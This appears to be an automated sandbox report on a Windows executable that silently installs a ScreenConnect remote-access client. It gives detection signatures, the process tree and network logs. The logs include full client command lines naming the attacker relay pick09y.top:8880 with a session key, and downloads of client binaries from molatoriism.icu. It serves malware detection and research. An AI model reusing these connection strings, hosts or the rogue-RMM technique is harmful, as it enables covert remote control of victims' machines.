Windows Analysis Report
pzPO97QouM.exe

Overview

General Information

Sample name: pzPO97QouM.exe
renamed because original name is a hash value
Original sample name: fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
Analysis ID: 1551436
MD5: 47891cf8a43a19e066fe70e812982c98
SHA1: b2a6e75ade18f10e2d0cd709630f5e551dbcefae
SHA256: fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899

Detection

ScreenConnect Tool
Score: 57
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Antivirus detection for URL or domain
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • pzPO97QouM.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\pzPO97QouM.exe" MD5: 47891CF8A43A19E066FE70E812982C98)
    • dfsvc.exe (PID: 7480 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 3320 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7576 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7856 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7480 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3320 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
10.0.ScreenConnect.WindowsClient.exe.970000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection, Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.9, DestinationIsIpv6: false, DestinationPort: 49727, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7480, Protocol: tcp, SourceIp: 104.21.96.148, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7576, ProcessName: svchost.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-07T17:56:09.240998+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.9 | 49819 | TCP
                  2024-11-07T17:56:47.202370+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.9 | 50001 | TCP
                  2024-11-07T17:56:05.088725+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49795 | TCP
                  2024-11-07T17:56:06.805502+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49806 | TCP
                  2024-11-07T17:56:13.053677+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49840 | TCP
                  2024-11-07T17:56:15.654543+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49851 | TCP
                  2024-11-07T17:56:18.231443+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49872 | TCP
                  2024-11-07T17:56:19.784500+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49879 | TCP
                  2024-11-07T17:56:24.162269+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49900 | TCP
                  2024-11-07T17:56:28.361341+0100 | 2009897 | 1 | A Network Trojan was detected | 104.21.96.148 | 443 | 192.168.2.9 | 49925 | TCP

                  AV Detection

                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 85.2% probability
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe, Code function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: pzPO97QouM.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: pzPO97QouM.exe, Static PE information: certificate valid
                  Source: unknown, HTTPS traffic detected: 104.21.96.148:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: pzPO97QouM.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E177000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1764722786.0000000002F42000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2595768885.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2596143693.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1756054618.000000000044D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674DFC5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1765477512.0000000005582000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe, Code function: 0_2_009C4A4B FindFirstFileExA,0_2_009C4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Registry value created: NULL Service
                  Source: global traffic, TCP traffic: 192.168.2.9:49968 -> 62.182.85.100:8880
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip, Connection: Keep-Alive
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49795
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49806
                  Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.9:49819
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49879
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49840
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49872
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49851
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49900
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49925
                  Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.9:50001
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: molatoriism.icu
                  Source: global trafficDNS traffic detected: DNS query: pick09y.top
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
